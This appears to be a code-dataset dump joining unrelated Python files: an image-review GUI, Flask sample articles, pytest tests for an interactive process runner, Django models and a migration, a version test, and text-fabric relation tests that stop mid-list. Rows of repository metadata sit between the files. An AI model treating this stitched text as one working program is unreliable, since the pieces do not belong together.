rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.image[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
else:
print("no more detections to check")
def onClickSave(self):
self.gfrc_results.to_csv(self.results_path, index=False)
def onClickBack(self):
# update details
self.idx = self.idx - 1
self.gfrc_results['checked'].iloc[self.idx] = 0
self.gfrc_results['manual_result'].iloc[self.idx] = ""
self.imgwindow.config(image="")
row = self.gfrc_results.iloc[self.idx, :]
rowxmn = max(0, row.xmn - 25)
rowxmx = min(7360, row.xmx + 25)
rowymn = max(0, row.ymn - 25)
rowymx = min(4912, row.ymx + 25)
rowwindow = self.image[rowymn:rowymx, rowxmn:rowxmx, :]
load = Image.fromarray(rowwindow)
render = ImageTk.PhotoImage(load)
# labels can be text or images
self.imgwindow = tk.Label(self, image=render)
self.imgwindow.image = render
self.imgwindow.place(x=0, y=0)
| 37.936464
| 159
| 0.611156
| 1,739
| 13,733
| 4.72858
| 0.116159
| 0.057522
| 0.07479
| 0.043901
| 0.834245
| 0.8278
| 0.804937
| 0.785845
| 0.761158
| 0.751064
| 0
| 0.027144
| 0.278381
| 13,733
| 361
| 160
| 38.041551
| 0.802624
| 0.073545
| 0
| 0.740458
| 0
| 0.003817
| 0.055963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053435
| false
| 0
| 0.026718
| 0
| 0.087786
| 0.022901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb172cc3c25555f796a123d656f33c66b487cc0c
| 2,116
|
py
|
Python
|
data.py
|
essien1990/Flask-Mysqldb
|
e0917b90c45a0aaf922bfa672ddb479cb450a02d
|
[
"MIT"
] | null | null | null |
data.py
|
essien1990/Flask-Mysqldb
|
e0917b90c45a0aaf922bfa672ddb479cb450a02d
|
[
"MIT"
] | 6
|
2020-06-05T22:57:03.000Z
|
2021-06-10T18:48:39.000Z
|
data.py
|
essien1990/Flask-Mysqldb
|
e0917b90c45a0aaf922bfa672ddb479cb450a02d
|
[
"MIT"
] | 1
|
2021-12-16T17:09:52.000Z
|
2021-12-16T17:09:52.000Z
|
def Articles():
articles = [
{
'id': 1,
'title': 'Article One',
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.',
'author': 'Felix Essienne',
'created_at': '04-25-2019'
},
{
'id': 2,
'title': 'Article Two',
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.',
'author': 'John Doe',
'created_at': '11-01-2019'
},
{
'id': 3,
'title': 'Article Three',
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.',
'author': 'Adelaide Nyaba',
'created_at': '04-12-2019'
},
{
'id': 4,
'title': 'Article Four',
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.',
'author': 'Rosina Ama',
'created_at': '01-09-2019'
}
]
return articles
| 62.235294
| 358
| 0.649338
| 269
| 2,116
| 5.092937
| 0.297398
| 0.035037
| 0.040876
| 0.055474
| 0.840876
| 0.840876
| 0.840876
| 0.840876
| 0.840876
| 0.840876
| 0
| 0.023514
| 0.276465
| 2,116
| 33
| 359
| 64.121212
| 0.871326
| 0
| 0
| 0.125
| 0
| 0.125
| 0.747164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb43cc296228e5df371c4f71dc501d09ccadf778
| 8,204
|
py
|
Python
|
test/control/process/test_interactive.py
|
HansBug/pji
|
449d171cea0c03f4c302da886988f36f70e34ee6
|
[
"Apache-2.0"
] | null | null | null |
test/control/process/test_interactive.py
|
HansBug/pji
|
449d171cea0c03f4c302da886988f36f70e34ee6
|
[
"Apache-2.0"
] | null | null | null |
test/control/process/test_interactive.py
|
HansBug/pji
|
449d171cea0c03f4c302da886988f36f70e34ee6
|
[
"Apache-2.0"
] | null | null | null |
import time
from threading import Thread
import pytest
from pji.control import interactive_process, ResourceLimit, InteractiveProcess, RunResultStatus
# noinspection DuplicatedCode
@pytest.mark.unittest
class TestControlProcessInteractive:
def test_interactive_process_simple(self):
_before_start = time.time()
with interactive_process(
args="echo 233 && sleep 2 && echo 2334",
shell=True,
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
time.sleep(0.5)
assert _output == [b'233']
time.sleep(3)
assert _output == [b'233', b'2334']
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_with_env(self):
_before_start = time.time()
with interactive_process(
args="echo 233 && sleep 2 && echo ${ENV_TEST}",
shell=True,
environ={'ENV_TEST': '2334'},
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
time.sleep(0.5)
assert _output == [b'233']
time.sleep(3)
assert _output == [b'233', b'2334']
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_with_input(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'}
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(1.0)
assert _output == [b'233']
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233', b'233jsdf']
assert ip.result.result is None
assert ip.status == RunResultStatus.NOT_COMPLETED
assert not ip.ok
assert not ip.completed
ip.close_stdin()
ip.join()
_result = ip.result.result
assert ip.ok
assert ip.completed
assert ip.status == RunResultStatus.SUCCESS
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
def test_interactive_process_rtle(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'},
resources=ResourceLimit(
max_real_time='2s',
)
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(2.0)
assert _output == [b'233']
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
with pytest.raises(BrokenPipeError):
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
ip.close_stdin()
ip.join()
_result = ip.result.result
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 9
def test_interactive_process_rtle_pass(self):
_before_start = time.time()
with interactive_process(
args='sh',
environ={'ENV_TEST': '233jsdf'},
resources=ResourceLimit(
max_real_time='4s',
)
) as ip:
_after_start = time.time()
assert _before_start <= ip.start_time <= _after_start
_output = []
def _ip_loader():
for _rel_time, _tag, _line in ip.output_yield:
_output.append(_line)
ip_loader_thread = Thread(target=_ip_loader)
ip_loader_thread.start()
ip.print_stdin(bytes('echo 233', 'utf8'))
time.sleep(0.2)
assert _output == [b'233']
time.sleep(2.0)
assert _output == [b'233']
ip.print_stdin(bytes('echo ${ENV_TEST}', 'utf8'))
time.sleep(0.2)
assert _output == [b'233', b'233jsdf']
assert ip.result.result is None
assert ip.result.status == RunResultStatus.NOT_COMPLETED
assert not ip.ok
assert not ip.completed
ip.close_stdin()
ip.join()
_result = ip.result.result
assert ip.ok
assert ip.completed
assert ip.status == RunResultStatus.SUCCESS
assert _result.ok
assert _result is not None
assert _result.exitcode == 0
assert _result.signal_code == 0
@pytest.mark.timeout(5.0)
def test_interactive_process_direct_close_1(self):
with interactive_process(
args="sh",
) as ip:
assert isinstance(ip, InteractiveProcess)
ip.print_stdin(b'echo 233')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'233'
ip.print_stdin(b'echo 2334')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'2334'
_result = ip.result.result
assert _result.ok
@pytest.mark.timeout(5.0)
def test_interactive_process_direct_close_2(self):
with interactive_process(
args="sh",
) as ip:
assert isinstance(ip, InteractiveProcess)
ip.print_stdin(b'echo 233')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'233'
ip.print_stdin(b'echo 2334')
_, _tag, _line = next(ip.output_yield)
assert _tag == 'stdout'
assert _line.rstrip(b'\r\n') == b'2334'
ip.close_stdin()
_result = ip.result.result
assert _result.ok
def test_interactive_process_wtf(self):
with pytest.raises(EnvironmentError):
with interactive_process(
args="what_the_fuck -c 'echo 233 && sleep 2 && echo 2334'",
):
pytest.fail('Should not reach here')
| 31.79845
| 95
| 0.534252
| 901
| 8,204
| 4.567148
| 0.114317
| 0.038882
| 0.041069
| 0.050547
| 0.892831
| 0.881896
| 0.87582
| 0.859295
| 0.859295
| 0.859295
| 0
| 0.033256
| 0.365919
| 8,204
| 257
| 96
| 31.922179
| 0.757785
| 0.003291
| 0
| 0.852941
| 0
| 0
| 0.06104
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 1
| 0.063725
| false
| 0.004902
| 0.019608
| 0
| 0.088235
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7048e211710fc18b48264702ef5bd2f7b068e8f0
| 194
|
py
|
Python
|
route53/xml_generators/__init__.py
|
jccastillocano/python-route53
|
db182f99f2b6028b134bc45669ea0380d50fd75e
|
[
"MIT"
] | null | null | null |
route53/xml_generators/__init__.py
|
jccastillocano/python-route53
|
db182f99f2b6028b134bc45669ea0380d50fd75e
|
[
"MIT"
] | null | null | null |
route53/xml_generators/__init__.py
|
jccastillocano/python-route53
|
db182f99f2b6028b134bc45669ea0380d50fd75e
|
[
"MIT"
] | null | null | null |
from .created_hosted_zone import create_hosted_zone_writer
from .change_resource_record_set import change_resource_record_set_writer
from .created_health_check import create_health_check_writer
| 48.5
| 73
| 0.92268
| 29
| 194
| 5.586207
| 0.448276
| 0.135802
| 0.246914
| 0.283951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061856
| 194
| 3
| 74
| 64.666667
| 0.89011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
706a452a1ebb8b63be881c45c8cf98f73c6ee346
| 4,717
|
py
|
Python
|
web/dvdrental/database_views/models.py
|
osmanirosado/dvdrental-adminsite
|
15abe206620b36745abc17cd4af4d2499f6ada05
|
[
"MIT"
] | null | null | null |
web/dvdrental/database_views/models.py
|
osmanirosado/dvdrental-adminsite
|
15abe206620b36745abc17cd4af4d2499f6ada05
|
[
"MIT"
] | 4
|
2021-04-08T21:56:00.000Z
|
2022-02-10T13:22:49.000Z
|
web/dvdrental/database_views/models.py
|
osmanirosado/dvdrental-adminsite
|
15abe206620b36745abc17cd4af4d2499f6ada05
|
[
"MIT"
] | null | null | null |
from django.db import models
class ActorInfo(models.Model):
actor_id = models.IntegerField(blank=True, primary_key=True)
first_name = models.CharField(max_length=45, blank=True, null=True)
last_name = models.CharField(max_length=45, blank=True, null=True)
film_info = models.TextField(blank=True, null=True)
class Meta:
verbose_name = 'Actor Info'
verbose_name_plural = 'Actor Info List'
managed = False # Created from a view. Don't remove.
db_table = 'actor_info'
class CustomerList(models.Model):
id = models.IntegerField(blank=True, primary_key=True)
name = models.TextField(blank=True, null=True)
address = models.CharField(max_length=50, blank=True, null=True)
zip_code = models.CharField(db_column='zip code', max_length=10, blank=True,
null=True) # Field renamed to remove unsuitable characters.
phone = models.CharField(max_length=20, blank=True, null=True)
city = models.CharField(max_length=50, blank=True, null=True)
country = models.CharField(max_length=50, blank=True, null=True)
notes = models.TextField(blank=True, null=True)
sid = models.SmallIntegerField(blank=True, null=True)
class Meta:
verbose_name = 'Customer Info'
verbose_name_plural = 'Customer List'
managed = False # Created from a view. Don't remove.
db_table = 'customer_list'
class FilmList(models.Model):
fid = models.IntegerField(blank=True, primary_key=True)
title = models.CharField(max_length=255, blank=True, null=True)
description = models.TextField(blank=True, null=True)
category = models.CharField(max_length=25, blank=True, null=True)
price = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
length = models.SmallIntegerField(blank=True, null=True)
rating = models.TextField(blank=True, null=True) # This field type is a guess.
actors = models.TextField(blank=True, null=True)
class Meta:
verbose_name = 'Film Info'
verbose_name_plural = 'Film List'
managed = False # Created from a view. Don't remove.
db_table = 'film_list'
class NicerButSlowerFilmList(models.Model):
fid = models.IntegerField(blank=True, primary_key=True)
title = models.CharField(max_length=255, blank=True, null=True)
description = models.TextField(blank=True, null=True)
category = models.CharField(max_length=25, blank=True, null=True)
price = models.DecimalField(max_digits=4, decimal_places=2, blank=True, null=True)
length = models.SmallIntegerField(blank=True, null=True)
rating = models.TextField(blank=True, null=True) # This field type is a guess.
actors = models.TextField(blank=True, null=True)
class Meta:
verbose_name = 'Film Info'
verbose_name_plural = 'Nice But Slower Film List'
managed = False # Created from a view. Don't remove.
db_table = 'nicer_but_slower_film_list'
class SalesByFilmCategory(models.Model):
category = models.CharField(max_length=25, blank=True, primary_key=True)
total_sales = models.DecimalField(max_digits=65535, decimal_places=65535, blank=True, null=True)
class Meta:
verbose_name = 'Film Category Sales'
verbose_name_plural = 'Sales by Film Category'
managed = False # Created from a view. Don't remove.
db_table = 'sales_by_film_category'
class SalesByStore(models.Model):
store = models.TextField(blank=True, primary_key=True)
manager = models.TextField(blank=True, null=True)
total_sales = models.DecimalField(max_digits=65535, decimal_places=65535, blank=True, null=True)
class Meta:
verbose_name = 'Store Sales'
verbose_name_plural = 'Sales by Store'
managed = False # Created from a view. Don't remove.
db_table = 'sales_by_store'
class StaffList(models.Model):
id = models.IntegerField(blank=True, primary_key=True)
name = models.TextField(blank=True, null=True)
address = models.CharField(max_length=50, blank=True, null=True)
zip_code = models.CharField(db_column='zip code', max_length=10, blank=True,
null=True) # Field renamed to remove unsuitable characters.
phone = models.CharField(max_length=20, blank=True, null=True)
city = models.CharField(max_length=50, blank=True, null=True)
country = models.CharField(max_length=50, blank=True, null=True)
sid = models.SmallIntegerField(blank=True, null=True)
class Meta:
verbose_name = 'Staff Info'
verbose_name_plural = 'Staff List'
managed = False # Created from a view. Don't remove.
db_table = 'staff_list'
| 43.275229
| 100
| 0.698537
| 631
| 4,717
| 5.090333
| 0.14897
| 0.117684
| 0.141656
| 0.185243
| 0.856787
| 0.846513
| 0.815068
| 0.815068
| 0.788294
| 0.787049
| 0
| 0.015835
| 0.196735
| 4,717
| 108
| 101
| 43.675926
| 0.831882
| 0.083528
| 0
| 0.597701
| 0
| 0
| 0.071677
| 0.011134
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.655172
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7088892f4f83b2fb78cfdaf95cd8a08c5a95cfd7
| 150
|
py
|
Python
|
cirq-rigetti/cirq_rigetti/_version_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | 1
|
2022-02-05T22:17:39.000Z
|
2022-02-05T22:17:39.000Z
|
cirq-rigetti/cirq_rigetti/_version_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | 4
|
2022-01-16T14:12:15.000Z
|
2022-02-24T03:58:46.000Z
|
cirq-rigetti/cirq_rigetti/_version_test.py
|
LLcat1217/Cirq
|
b88069f7b01457e592ad69d6b413642ef11a56b8
|
[
"Apache-2.0"
] | null | null | null |
# pylint: disable=wrong-or-nonexistent-copyright-notice
import cirq_rigetti
def test_version():
assert cirq_rigetti.__version__ == "0.15.0.dev"
| 21.428571
| 55
| 0.766667
| 21
| 150
| 5.142857
| 0.809524
| 0.203704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030075
| 0.113333
| 150
| 6
| 56
| 25
| 0.781955
| 0.353333
| 0
| 0
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
560bcb537c6377d6282c8fe641a6de59f4a53459
| 1,872
|
py
|
Python
|
api/applications/migrations/0022_auto_20200331_1107.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | 3
|
2019-05-15T09:30:39.000Z
|
2020-04-22T16:14:23.000Z
|
api/applications/migrations/0022_auto_20200331_1107.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | 85
|
2019-04-24T10:39:35.000Z
|
2022-03-21T14:52:12.000Z
|
api/applications/migrations/0022_auto_20200331_1107.py
|
django-doctor/lite-api
|
1ba278ba22ebcbb977dd7c31dd3701151cd036bf
|
[
"MIT"
] | 1
|
2021-01-17T11:12:19.000Z
|
2021-01-17T11:12:19.000Z
|
# Generated by Django 2.2.11 on 2020-03-31 11:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("applications", "0021_baseapplication_agreed_to_foi"),
]
operations = [
migrations.AddField(
model_name="openapplication",
name="is_temp_direct_control",
field=models.BooleanField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name="openapplication", name="proposed_return_date", field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name="openapplication",
name="temp_direct_control_details",
field=models.CharField(blank=True, default=None, max_length=2200, null=True),
),
migrations.AddField(
model_name="openapplication",
name="temp_export_details",
field=models.CharField(blank=True, default=None, max_length=2200, null=True),
),
migrations.AddField(
model_name="standardapplication",
name="is_temp_direct_control",
field=models.BooleanField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name="standardapplication",
name="proposed_return_date",
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name="standardapplication",
name="temp_direct_control_details",
field=models.CharField(blank=True, default=None, max_length=2200, null=True),
),
migrations.AddField(
model_name="standardapplication",
name="temp_export_details",
field=models.CharField(blank=True, default=None, max_length=2200, null=True),
),
]
| 36
| 117
| 0.620726
| 186
| 1,872
| 6.053763
| 0.274194
| 0.127886
| 0.16341
| 0.191829
| 0.852575
| 0.852575
| 0.815275
| 0.815275
| 0.78508
| 0.741563
| 0
| 0.026316
| 0.269231
| 1,872
| 51
| 118
| 36.705882
| 0.796784
| 0.024573
| 0
| 0.777778
| 1
| 0
| 0.196272
| 0.072368
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.022222
| 0
| 0.088889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
562d4f798cac352a3e606fbd981fa61a3716babb
| 54,159
|
py
|
Python
|
test/generic/relations.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 10
|
2017-10-30T22:38:00.000Z
|
2018-12-12T06:10:10.000Z
|
test/generic/relations.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 37
|
2017-10-19T12:06:54.000Z
|
2018-12-13T10:18:23.000Z
|
test/generic/relations.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 3
|
2018-02-28T12:37:21.000Z
|
2018-06-23T08:32:54.000Z
|
import sys
import unittest
from tf.fabric import Fabric
# LOAD THE TEST CORPUS
TF = Fabric('tf')
api = TF.load('sign name')
F = api.F
S = api.S
# MAKE CUSTOM SETS OF NODES
Sign = set(range(1, F.otype.maxSlot + 1))
Node = set(range(1, F.otype.maxNode + 1))
sets = dict(Sign=Sign, Node=Node)
# RUN A QUERY, OPTIONALLY WITH CUSTOM SETS
def query(template, sets=None):
return (
tuple(S.search(template))
if sets is None else
tuple(S.search(template, sets=sets))
)
# DEFINE THE TESTS
relationKey = {
'=': 'equal',
'#': 'unequal',
'<': 'canonicalBefore',
'>': 'canonicalAfter',
'==': 'sameSlots',
'&&': 'overlap',
'##': 'differentSlots',
'||': 'disjointSlots',
'[[': 'has',
']]': 'in',
'<<': 'slotBefore',
'>>': 'slotAfter',
'=:': 'startSame',
'=0:': 'startSame0',
'=1:': 'startSame1',
'=2:': 'startSame2',
':=': 'endSame',
':0=': 'endSame0',
':1=': 'endSame1',
':2=': 'endSame2',
'::': 'sameBoundary',
':0:': 'sameBoundary0',
':1:': 'sameBoundary1',
':2:': 'sameBoundary2',
'<:': 'adjacentBefore',
'<0:': 'adjacentBefore0',
'<1:': 'adjacentBefore1',
'<2:': 'adjacentBefore2',
':>': 'adjacentAfter',
':0>': 'adjacentAfter0',
':1>': 'adjacentAfter1',
':2>': 'adjacentAfter2',
'.namesign=namepart.': 'featureEqualSP',
'.namesign=namesign.': 'featureEqualSS',
'.namesign#namesign.': 'featureUnequalSS',
'.namesign.': 'featureEqualSS',
'.number.': 'featureEqualN',
'.number#number.': 'featureUnEqualN',
'.number>number.': 'featureGreaterN',
'.number<number.': 'featureLesserN',
'.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': 'featureFuzzySP1',
'.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namesign.': 'featureFuzzySS1',
'.namepart~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': 'featureFuzzyPP1',
'.namesign~([sp]-)|(-[sp])~namepart.': 'featureFuzzySP2',
'.namesign~([sp]-)|(-[sp])~namesign.': 'featureFuzzySS2',
'.namepart~([sp]-)|(-[sp])~namepart.': 'featureFuzzyPP2',
}
# DEFINE THE PARAMETERS FOR EACH TEST
comparisons = {
'=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('part', 's1', 'part', 's1', True),
('part', 's1', 'part', 's2', False),
('part', 'lower', 'part', 'lower', True),
('part', 'lower', 'part', 'upper', False),
),
'#': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('part', 's1', 'part', 's1', False),
('part', 's1', 'part', 's2', True),
('part', 'lower', 'part', 'lower', False),
('part', 'lower', 'part', 'upper', True),
),
'<': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'd', 'sign', 'g', True),
('sign', 'g', 'sign', 'd', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'big', 'part', 'small1', True),
('part', 'big', 'part', 'small2', True),
('part', 'big', 'part', 'small3', True),
('part', 'big', 'part', 'small4', True),
('part', 'small1', 'part', 'big', False),
('part', 'small2', 'part', 'big', False),
('part', 'small3', 'part', 'big', False),
('part', 'small4', 'part', 'big', False),
('part', 'small5', 'part', 'big', False),
('part', 'small6', 'part', 'big', False),
('part', 'small7', 'part', 'big', False),
('part', 'small8', 'part', 'big', True),
('sign', 'a', 'part', 'big', True),
('sign', 'b', 'part', 'big', True),
('sign', 'c', 'part', 'big', False),
('sign', 'd', 'part', 'big', False),
('sign', 'i', 'part', 'big', False),
('sign', 'j', 'part', 'big', False),
),
'>': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'd', 'sign', 'g', False),
('sign', 'g', 'sign', 'd', True),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'big', 'part', 'small1', False),
('part', 'big', 'part', 'small2', False),
('part', 'big', 'part', 'small3', False),
('part', 'big', 'part', 'small4', False),
('part', 'small1', 'part', 'big', True),
('part', 'small2', 'part', 'big', True),
('part', 'small3', 'part', 'big', True),
('part', 'small4', 'part', 'big', True),
('part', 'small5', 'part', 'big', True),
('part', 'small6', 'part', 'big', True),
('part', 'small7', 'part', 'big', True),
('part', 'small8', 'part', 'big', False),
('sign', 'a', 'part', 'big', False),
('sign', 'b', 'part', 'big', False),
('sign', 'c', 'part', 'big', True),
('sign', 'd', 'part', 'big', True),
('sign', 'i', 'part', 'big', True),
('sign', 'j', 'part', 'big', True),
),
'==': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('part', 'john', 'part', 'mary', True),
('part', 'john', 'part', 'small4', False),
('sign', 'a', 'part', 's1', True),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'part', 'ss1', True),
('part', 'small1', 'part', 'big', False),
('part', 'big', 'part', 'small1', False),
),
'&&': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('part', 'john', 'part', 'mary', True),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'small4', True),
('part', 'lower', 'part', 'upper', False),
('part', 'odd', 'part', 'even', False),
('sign', 'c', 'part', 'odd', True),
('sign', 'd', 'part', 'odd', False),
('sign', 'c', 'part', 'even', False),
('sign', 'd', 'part', 'even', True),
),
'##': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('part', 'john', 'part', 'mary', False),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'big', True),
('sign', 'c', 'part', 'odd', True),
('sign', 'd', 'part', 'odd', True),
('part', 'even', 'sign', 'c', True),
('part', 'even', 'sign', 'd', True),
),
'||': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('part', 'john', 'part', 'mary', False),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'small4', False),
('part', 'lower', 'part', 'upper', True),
('part', 'odd', 'part', 'even', True),
('sign', 'c', 'part', 'odd', False),
('sign', 'd', 'part', 'odd', True),
('sign', 'c', 'part', 'even', True),
('sign', 'd', 'part', 'even', False),
),
'[[': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
